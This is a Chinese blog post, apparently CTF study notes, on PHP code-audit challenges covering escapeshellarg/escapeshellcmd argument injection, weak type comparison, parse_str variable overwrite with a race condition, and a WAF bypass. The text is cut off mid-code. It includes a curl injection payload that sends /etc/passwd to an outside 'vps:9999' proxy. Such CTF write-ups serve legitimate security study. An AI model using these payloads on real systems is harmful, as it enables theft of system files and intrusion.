<h2 id="DAY5–escapeshellarg和escapeshellcmd联合使用导致多参数注入"><a href="#DAY5–escapeshellarg和escapeshellcmd联合使用导致多参数注入" class="headerlink" title="DAY5–escapeshellarg和escapeshellcmd联合使用导致多参数注入"></a>DAY5–escapeshellarg和escapeshellcmd联合使用导致多参数注入</h2><p>这个题类似的前不久做过，<code>moctf</code>中的<a href="https://zhhhy.github.io/" target="_blank" rel="noopener">unset</a>。学习到了利用特定情境下<code>unset</code>删除了<code>超全局变量_GET</code>导致绕过<code>waf</code>。</p>
<p>第一部分问题代码如下，具体分析由于上篇博客已经写过了。引用一下<code>红日安全</code>的分析</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">foreach</span>(<span class="keyword">array</span>(<span class="string">'_POST'</span>, <span class="string">'_GET'</span>, <span class="string">'_COOKIE'</span>) <span class="keyword">as</span> $__R) &#123;</span><br><span class="line">    <span class="keyword">if</span>($$__R) &#123; </span><br><span class="line">        <span class="keyword">foreach</span>($$__R <span class="keyword">as</span> $__k =&gt; $__v) &#123; </span><br><span class="line">            <span class="keyword">if</span>(<span class="keyword">isset</span>($$__k) &amp;&amp; $$__k == $__v) <span class="keyword">unset</span>($$__k); </span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>我通过 <strong>GET</strong> 请求向 <strong>index.php</strong> 提交 <strong>flag=test</strong> ，接着通过 <strong>POST</strong> 请求提交 <strong>_GET[flag]=test</strong> 。当开始遍历 <strong>$_POST</strong> 超全局数组的时候， <strong>$__k</strong> 代表 <strong>_GET[flag]</strong> ，所以 <strong>$$__k</strong> 就是 <strong>$_GET[flag]</strong> ，即 <strong>test</strong> 值，此时 <strong>$$__k</strong> == <strong>$__v</strong> 成立，变量 <strong>$_GET[flag]</strong> 就被 <strong>unset</strong> 了。</p>
</blockquote>
<p>我们成功绕过<code>waf</code>之后需要使得<code>if(md5($_GET[&#39;flag&#39;] ) == md5($_GET[&#39;hongri&#39;]))</code>成立。这很简单，利用<code>php</code>的<code>弱类型</code>的特性可以成功绕过。</p>
<p>接下来解释，利用<code>curl</code>读取文件。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">    $url = $_GET[<span class="string">'url'</span>];</span><br><span class="line">    $urlInfo = parse_url($url);</span><br><span class="line">    <span class="keyword">if</span>(!(<span class="string">"http"</span> === strtolower($urlInfo[<span class="string">"scheme"</span>]) || <span class="string">"https"</span>===strtolower($urlInfo[<span class="string">"scheme"</span>])))&#123;</span><br><span class="line">        <span class="keyword">die</span>( <span class="string">"scheme error!"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    $url = escapeshellarg($url);</span><br><span class="line">    $url = escapeshellcmd($url);</span><br><span class="line">    system(<span class="string">"curl "</span>.$url);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但是呢,<code>$url</code>经过<code>escapeshellarg</code>和<code>escapeshellcmd</code>的处理。先看看这两个函数是做什么的</p>
<blockquote>
<h1 id="escapeshellarg"><a href="#escapeshellarg" class="headerlink" title="escapeshellarg"></a>escapeshellarg</h1><p>(PHP 4 &gt;= 4.0.3, PHP 5, PHP 7)</p>
<p>escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数</p>
<h3 id="说明"><a href="#说明" class="headerlink" title="说明"></a>说明</h3><p>​    string <strong>escapeshellarg</strong>     ( string <code>$arg</code>    )</p>
<p>​    <strong>escapeshellarg()</strong> 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号，这样以确保能够直接将一个字符串传入 shell 函数，并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含  <a href="http://php.net/manual/zh/function.exec.php" target="_blank" rel="noopener">exec()</a>, <a href="http://php.net/manual/zh/function.system.php" target="_blank" rel="noopener">system()</a>     <a href="http://php.net/manual/zh/language.operators.execution.php" target="_blank" rel="noopener">执行运算符</a> 。   </p>
</blockquote>
<blockquote>
<h1 id="escapeshellcmd"><a href="#escapeshellcmd" class="headerlink" title="escapeshellcmd"></a>escapeshellcmd</h1><p>(PHP 4, PHP 5, PHP 7)</p>
<p>escapeshellcmd — shell 元字符转义</p>
<h3 id="说明-1"><a href="#说明-1" class="headerlink" title="说明"></a>说明</h3><p>​    string <strong>escapeshellcmd</strong>     ( string <code>$command</code>    )</p>
<p>​    <strong>escapeshellcmd()</strong> 对字符串中可能会欺骗     shell 命令执行任意命令的字符进行转义。    此函数保证用户输入的数据在传送到     <a href="http://php.net/manual/zh/function.exec.php" target="_blank" rel="noopener">exec()</a> 或    <a href="http://php.net/manual/zh/function.system.php" target="_blank" rel="noopener">system()</a> 函数，或者 <a href="http://php.net/manual/zh/language.operators.execution.php" target="_blank" rel="noopener">执行操作符</a> 之前进行转义。   </p>
<p>​     反斜线（\）会在以下字符之前插入：    <em>&amp;#;`|\</em>?~&lt;&gt;^()[]{}$*, <em>\x0A</em>    和 <em>\xFF</em>。 <em>‘</em> 和 *”*    仅在不配对儿的时候被转义。    在 Windows 平台上，所有这些字符以及 <em>%</em> 和 <em>!</em> 字符都会被空格代替。   </p>
</blockquote>
<p>这样看可能很抽象，抽出题目关键代码，单独建个文件测试一下。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">$url = $_GET[<span class="string">'url'</span>];</span><br><span class="line">        $urlInfo = parse_url($url);</span><br><span class="line">        <span class="keyword">if</span>(!(<span class="string">"http"</span> === strtolower($urlInfo[<span class="string">"scheme"</span>]) || <span class="string">"https"</span>===strtolower($urlInfo[<span class="string">"scheme"</span>])))&#123;</span><br><span class="line">            <span class="keyword">die</span>( <span class="string">"scheme error!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">	var_dump($url);</span><br><span class="line">	<span class="keyword">echo</span><span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">        $url = escapeshellarg($url);</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"escapeshellarg&lt;br&gt;"</span>;</span><br><span class="line">	var_dump($url);</span><br><span class="line">        $url = escapeshellcmd($url);</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"escapeshellcmd&lt;br&gt;"</span>;</span><br><span class="line">	var_dump($url);</span><br><span class="line">        system(<span class="string">"curl "</span>.$url);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="php-study-1/9.png" alt></p>
<p>观察发现经过<code>escapeshellarg</code>函数后，多了一个双引号。也就是强制加了一对<code>双引号</code>使得传入的一定是个<code>字符串</code>,而<code>escapeshellcmd</code>是将双引号进行转义，问题在于，这个转义是将不配对的双引号转义，也就是如果我们多加入一个<code>双引号</code>闭合前面<code>双引号</code>导致转义被破坏。<strong>这部分没有复现成功换了<code>PHP5</code>和<code>PHP7</code>都失败了，贴上红日安全的图，之后找个时间填坑。</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//127.0.0.1/index1.php?url=http://127.0.0.1/flag.php' -T /etc/passwd</span></span><br></pre></td></tr></table></figure>

<p><img src="php-study-1/11.png" alt></p>
<p>这样也就是使得后面的语句逃脱了引号的包裹，使得成为独立的参数可以被<code>cur</code>l执行</p>
<blockquote>
<p>在 <strong>curl</strong> 中存在 <strong>-F</strong> 提交表单的方法，也可以提交文件。 <strong>-F &lt;key=value&gt;</strong> 向服务器POST表单，例如： <strong>curl -F “web=@index.html;type=text/html” url.com</strong> 。提交文件之后，利用代理的方式进行监听，这样就可以截获到文件了,同时还不受最后的的影响。那么最后的payload为：</p>
</blockquote>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://baidu.com/<span class="string">' -F file=@/etc/passwd -x  vps:9999</span></span><br></pre></td></tr></table></figure>

<p><img src="php-study-1/12.png" alt></p>
<p>这题的思路：先是删除了<code>超全局变量_GET</code>绕过了<code>waf</code>,然后<code>escapeshellarg</code>将原有的字符串添加上一对双引号，保证传入的是一个字符，接着<code>escapeshellcmd</code>将特殊符号进行转义，但是他只能转义无法配对，也就是我们如果恶意添加一个单引号就可以绕乱原先的转义，再利用<code>curl请求</code>并且监听自己的端口就能得到回显的<code>flag</code></p>
<p>这题没复现成功，还是很不开心的。而且对于<code>curl</code>操作的一无所知，以至于后半部分的操作看的有些懵逼。不过也算有所收获，再接再厉吧。</p>
<h2 id="DAY6–不严格的正则匹配以及弱类型比较问题"><a href="#DAY6–不严格的正则匹配以及弱类型比较问题" class="headerlink" title="DAY6–不严格的正则匹配以及弱类型比较问题"></a>DAY6–不严格的正则匹配以及弱类型比较问题</h2><p>源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">'flag.php'</span>;</span><br><span class="line"><span class="keyword">if</span>  (<span class="string">"POST"</span> == $_SERVER[<span class="string">'REQUEST_METHOD'</span>])</span><br><span class="line">&#123;</span><br><span class="line">    $password = $_POST[<span class="string">'password'</span>];</span><br><span class="line">    <span class="keyword">if</span> (<span class="number">0</span> &gt;= preg_match(<span class="string">'/^[[:graph:]]&#123;12,&#125;$/'</span>, $password))</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'Wrong Format'</span>;</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">while</span> (<span class="keyword">TRUE</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        $reg = <span class="string">'/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/'</span>;</span><br><span class="line">        <span class="keyword">if</span> (<span class="number">6</span> &gt; preg_match_all($reg, $password, $arr))</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        $c = <span class="number">0</span>;</span><br><span class="line">        $ps = <span class="keyword">array</span>(<span class="string">'punct'</span>, <span class="string">'digit'</span>, <span class="string">'upper'</span>, <span class="string">'lower'</span>);</span><br><span class="line">        <span class="keyword">foreach</span> ($ps <span class="keyword">as</span> $pt)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span> (preg_match(<span class="string">"/[[:$pt:]]+/"</span>, $password))</span><br><span class="line">            $c += <span class="number">1</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> ($c &lt; <span class="number">3</span>) <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">if</span> (<span class="string">"42"</span> == $password) <span class="keyword">echo</span> $flag;</span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">echo</span> <span class="string">'Wrong password'</span>;</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>通读源代码，其实就是对<code>password</code>的各种限制，首先查一下，<code>graph</code>这些是什么玩意。</p>
<blockquote>
<table>
<thead>
<tr>
<th><em>ascii</em></th>
<th>0 - 127的ascii字符</th>
</tr>
</thead>
<tbody><tr>
<td><em>blank</em></td>
<td>空格和水平制表符</td>
</tr>
<tr>
<td><em>cntrl</em></td>
<td>控制字符</td>
</tr>
<tr>
<td><em>digit</em></td>
<td>十进制数(same as \d)</td>
</tr>
<tr>
<td><em>graph</em></td>
<td>打印字符, 不包括空格</td>
</tr>
<tr>
<td><em>lower</em></td>
<td>小写字母</td>
</tr>
<tr>
<td><em>print</em></td>
<td>打印字符,包含空格</td>
</tr>
<tr>
<td><em>punct</em></td>
<td>打印字符, 不包括字母和数字</td>
</tr>
<tr>
<td><em>space</em></td>
<td>空白字符 (比\s多垂直制表符)</td>
</tr>
<tr>
<td><em>upper</em></td>
<td>大写字母</td>
</tr>
<tr>
<td><em>word</em></td>
<td>单词字符(same as \w)</td>
</tr>
<tr>
<td><em>alnum</em></td>
<td>字母和数字</td>
</tr>
<tr>
<td><em>alpha</em></td>
<td>字母</td>
</tr>
<tr>
<td><em>xdigit</em></td>
<td>十六进制数字</td>
</tr>
</tbody></table>
</blockquote>
<p>先分析一下三个正则都是什么意思：</p>
<p><code>preg_match(&#39;/^[[:graph:]]{12,}$/&#39;, $password)</code>可打印的<code>字符</code>，不包括<code>空格</code>，<code>12个</code>以及以上。</p>
<p>  <code>$reg = &#39;/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/&#39;</code> 打印字符，十进制数字，大写字母，小写字母，输入的字符串，要是以上四种模式的任意一种。<code>if (6 &gt; preg_match_all($reg, $password, $arr))</code>而这一个判断，表示我们输入的字符串用四种模式得分割出<code>6</code>个子串。</p>
<p>做个测试,<code>test.php</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#$password="ZhhY12_123";</span></span><br><span class="line">$password=<span class="string">"ZhhY12"</span>;</span><br><span class="line">$reg = <span class="string">'/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/'</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="number">6</span> &gt; preg_match_all($reg, $password, $arr))</span><br><span class="line">    var_dump($arr[<span class="number">0</span>]);</span><br><span class="line"><span class="keyword">else</span> </span><br><span class="line">	<span class="keyword">echo</span> preg_match_all($reg, $password, $arr);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>当<code>$password=&quot;ZhhY12&quot;;</code>时得到如下输出</p>
<p><img src="php-study-1/15.png" alt></p>
<p>当<code>#$password=&quot;ZhhY12_123&quot;;</code>时</p>
<p><img src="php-study-1/16.png" alt></p>
<p><code>preg_match_all</code>返回的是成功匹配的次数。</p>
<p>接着看第三条正则<code>$ps = array(&#39;punct&#39;, &#39;digit&#39;, &#39;upper&#39;, &#39;lower&#39;);</code>可打印字符，数字，大小写字母</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ps = <span class="keyword">array</span>(<span class="string">'punct'</span>, <span class="string">'digit'</span>, <span class="string">'upper'</span>, <span class="string">'lower'</span>);</span><br><span class="line"><span class="keyword">foreach</span> ($ps <span class="keyword">as</span> $pt)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">if</span> (preg_match(<span class="string">"/[[:$pt:]]+/"</span>, $password))</span><br><span class="line">    $c += <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> ($c &lt; <span class="number">3</span>) <span class="keyword">break</span>;</span><br></pre></td></tr></table></figure>

<p>所以，这个代码块所表达的是，至少含有<code>数组</code>规定的类型中的三种。</p>
<p>拿到<code>flag</code>的条件是<code>if (&quot;42&quot; == $password) echo $flag;</code></p>
<p>目标很明确，找到一个满足上述条件的<code>password</code>就可以拿到<code>flag</code>。一开始我一心想构造一个值进过运算后等于<code>42</code></p>
<p>例如这个<code>2e0+40.000000</code>可是呢，<code>post</code>过去发现不行。。陷入了郁闷之中。。这边做了一个小测试。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$a=<span class="string">"2.0e+00000"</span>;</span><br><span class="line">$b=<span class="string">"2.0e+0.0000"</span>;</span><br><span class="line"><span class="keyword">if</span>($a==<span class="string">"2"</span>)</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"A true"</span>;</span><br><span class="line"><span class="keyword">if</span>($b==<span class="string">"2"</span>)</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"B ture"</span>；</span><br></pre></td></tr></table></figure>

<p><img src="php-study-1/17.png" alt></p>
<p>所以当我构造<code>42.0e+00000</code>就可以拿到<code>flag</code>。这个测试背后的原理并没有搞懂。。想不出一个合理的解释。。。</p>
<h2 id="DYA7–pares-str-变量覆盖和文件上传条件竞争问题"><a href="#DYA7–pares-str-变量覆盖和文件上传条件竞争问题" class="headerlink" title="DYA7–pares_str()变量覆盖和文件上传条件竞争问题"></a>DYA7–pares_str()变量覆盖和文件上传条件竞争问题</h2><p>源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">'hongri'</span>;</span><br><span class="line">$id = $_GET[<span class="string">'id'</span>];</span><br><span class="line">@parse_str($id);</span><br><span class="line"><span class="keyword">if</span> ($a[<span class="number">0</span>] != <span class="string">'QNKCDZO'</span> &amp;&amp; md5($a[<span class="number">0</span>]) == md5(<span class="string">'QNKCDZO'</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;a href="uploadsomething.php"&gt;flag is here&lt;/a&gt;'</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//uploadsomething.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">header(<span class="string">"Content-type:text/html;charset=utf-8"</span>);</span><br><span class="line">$referer = $_SERVER[<span class="string">'HTTP_REFERER'</span>];</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($referer)!== <span class="keyword">false</span>) &#123;</span><br><span class="line">    $savepath = <span class="string">"uploads/"</span> . sha1($_SERVER[<span class="string">'REMOTE_ADDR'</span>]) . <span class="string">"/"</span>;</span><br><span class="line">    <span class="keyword">if</span> (!is_dir($savepath)) &#123;</span><br><span class="line">        $oldmask = umask(<span class="number">0</span>);</span><br><span class="line">        mkdir($savepath, <span class="number">0777</span>);</span><br><span class="line">        umask($oldmask);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ((@$_GET[<span class="string">'filename'</span>]) &amp;&amp; (@$_GET[<span class="string">'content'</span>])) &#123;</span><br><span class="line">        <span class="comment">//$fp = fopen("$savepath".$_GET['filename'], 'w');</span></span><br><span class="line">        $content = <span class="string">'HRCTF&#123;y0u_n4ed_f4st&#125;   by:l1nk3r'</span>;</span><br><span class="line">        file_put_contents(<span class="string">"$savepath"</span> . $_GET[<span class="string">'filename'</span>], $content);</span><br><span class="line">        $msg = <span class="string">'Flag is here,come on~ '</span> . $savepath . htmlspecialchars($_GET[<span class="string">'filename'</span>]) . <span class="string">""</span>;</span><br><span class="line">        usleep(<span class="number">100000</span>);</span><br><span class="line">        $content = <span class="string">"Too slow!"</span>;</span><br><span class="line">        file_put_contents(<span class="string">"$savepath"</span> . $_GET[<span class="string">'filename'</span>], $content);</span><br><span class="line">    &#125;</span><br><span class="line">   <span class="keyword">print</span> <span class="string">&lt;&lt;&lt;EOT</span></span><br><span class="line"><span class="string">&lt;form action="" method="get"&gt;</span></span><br><span class="line"><span class="string">&lt;div class="form-group"&gt;</span></span><br><span class="line"><span class="string">&lt;label for="exampleInputEmail1"&gt;Filename&lt;/label&gt;</span></span><br><span class="line"><span class="string">&lt;input type="text" class="form-control" name="filename" id="exampleInputEmail1" placeholder="Filename"&gt;</span></span><br><span class="line"><span class="string">&lt;/div&gt;</span></span><br><span class="line"><span class="string">&lt;div class="form-group"&gt;</span></span><br><span class="line"><span class="string">&lt;label for="exampleInputPassword1"&gt;Content&lt;/label&gt;</span></span><br><span class="line"><span class="string">&lt;input type="text" class="form-control" name="content" id="exampleInputPassword1" placeholder="Contont"&gt;</span></span><br><span class="line"><span class="string">&lt;/div&gt;</span></span><br><span class="line"><span class="string">&lt;button type="submit" class="btn btn-default"&gt;Submit&lt;/button&gt;</span></span><br><span class="line"><span class="string">&lt;/form&gt;</span></span><br><span class="line"><span class="string">EOT;</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'you can not see this page'</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这题首先是一个变量覆盖的问题，<a href="https://www.freebuf.com/column/150731.html" target="_blank" rel="noopener">变量覆盖总结</a>。这里的变量覆盖是由于<code>parse_str</code>引起的。</p>
<blockquote>
<p> <strong>@parse_str($id);</strong> 这个函数不会检查变量 <strong>$id</strong> 是否存在，如果通过其他方式传入数据给变量 <strong>$id</strong> ,且当前 <strong>$id</strong> 中数据存在，它将会直接覆盖掉。</p>
</blockquote>
<p>直接贴<code>payload</code>为<code>?id=a[0]=s878926199a</code>这里不难理解，看上面的链接也能明白。就不赘述了。</p>
<p>其实这题做过。。<code>moctf</code>上就有现成的环境，不过当时并没有源码。<br>关键代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ((@$_GET[<span class="string">'filename'</span>]) &amp;&amp; (@$_GET[<span class="string">'content'</span>])) &#123;</span><br><span class="line">       <span class="comment">//$fp = fopen("$savepath".$_GET['filename'], 'w');</span></span><br><span class="line">       $content = <span class="string">'HRCTF&#123;y0u_n4ed_f4st&#125;   by:l1nk3r'</span>;</span><br><span class="line">       file_put_contents(<span class="string">"$savepath"</span> . $_GET[<span class="string">'filename'</span>], $content);</span><br><span class="line">       $msg = <span class="string">'Flag is here,come on~ '</span> . $savepath . htmlspecialchars($_GET[<span class="string">'filename'</span>]) . <span class="string">""</span>;</span><br><span class="line">       usleep(<span class="number">100000</span>);</span><br><span class="line">       $content = <span class="string">"Too slow!"</span>;</span><br><span class="line">       file_put_contents(<span class="string">"$savepath"</span> . $_GET[<span class="string">'filename'</span>], $content);</span><br><span class="line">   &#125;</span><br></pre></td></tr></table></figure>

<p>发现文件是固定写死的。<code>$msg = &#39;Flag is here,come on~ &#39; . $savepath . htmlspecialchars($_GET[&#39;filename&#39;]) . &quot;&quot;;</code> 虽然这有一个加密地址的操作<code>$savepath = &quot;uploads/&quot; . sha1($_SERVER[&#39;REMOTE_ADDR&#39;]) . &quot;/&quot;;</code>但是由于用户的<code>REMOTE_ADDR</code>是固定的，也就是<code>加密后的值</code>总是<code>固定的</code>。接着将<code>flag</code>写入上传的文件中，调用<code>usleep</code>讲线程挂起<code>1s</code>，最后写入<code>Too Slow!</code>。</p>
<p>很明显这是个条件竞争的问题。不过。。。这题是为了出题而出题吧？实战中应该是上传的脚本被后台程序删除了，导致无法<code>getshell</code>不过原理是相通的，只要在写入<code>Too slow！</code>之前访问到<code>flag</code>就行了。这里的前提是，每次上传的路径都不变，上面的代码恰好满足了这些条件。</p>
<h2 id="DAY8–无字母符号getshell"><a href="#DAY8–无字母符号getshell" class="headerlink" title="DAY8–无字母符号getshell"></a>DAY8–无字母符号getshell</h2><p>之前看过Ph神的博客。复现过一些。先放着，之后单独写一篇</p>
<h2 id="DAY9–变量覆盖导致的waf绕过"><a href="#DAY9–变量覆盖导致的waf绕过" class="headerlink" title="DAY9–变量覆盖导致的waf绕过"></a>DAY9–变量覆盖导致的waf绕过</h2><p>源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"><span class="keyword">include</span> <span class="string">'config.php'</span>;</span><br><span class="line"><span class="keyword">include</span> <span class="string">'function.php'</span>;</span><br><span class="line"></span><br><span class="line">$conn = <span class="keyword">new</span> mysqli($servername,$username,$password,$dbname);</span><br><span class="line"><span class="keyword">if</span>($conn-&gt;connect_error)&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">'连接数据库失败'</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$sql = <span class="string">"SELECT COUNT(*) FROM users"</span>;</span><br><span class="line">$result = $conn-&gt;query($sql);</span><br><span class="line"><span class="keyword">if</span>($result-&gt;num_rows &gt; <span class="number">0</span>)&#123;</span><br><span class="line">    $row = $result-&gt;fetch_assoc();</span><br><span class="line">    $id = $row[<span class="string">'COUNT(*)'</span>] + <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">die</span>($conn-&gt;error);</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'msg'</span>]) &amp;&amp; $_POST[<span class="string">'msg'</span>] !==<span class="string">''</span>)&#123;</span><br><span class="line">    $msg = addslashes($_POST[<span class="string">'msg'</span>]);</span><br><span class="line">    $msg = replace_bad_word(convert($msg));</span><br><span class="line">    $sql = <span class="string">"INSERT INTO users VALUES($id,'"</span>.$msg.<span class="string">"')"</span>;</span><br><span class="line">    $result = $conn-&gt;query($sql);</span><br><span class="line">    <span class="keyword">if</span>($conn-&gt;error) <span class="keyword">die</span>($conn-&gt;error);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;center&gt;&lt;h1&gt;Welcome come to HRSEC message board&lt;/center&gt;&lt;/h1&gt;"</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&lt;&lt;&lt;EOF</span></span><br><span class="line"><span class="string">&lt;center&gt;</span></span><br><span class="line"><span class="string">    &lt;form action="index.php" method="post"&gt;</span></span><br><span class="line"><span 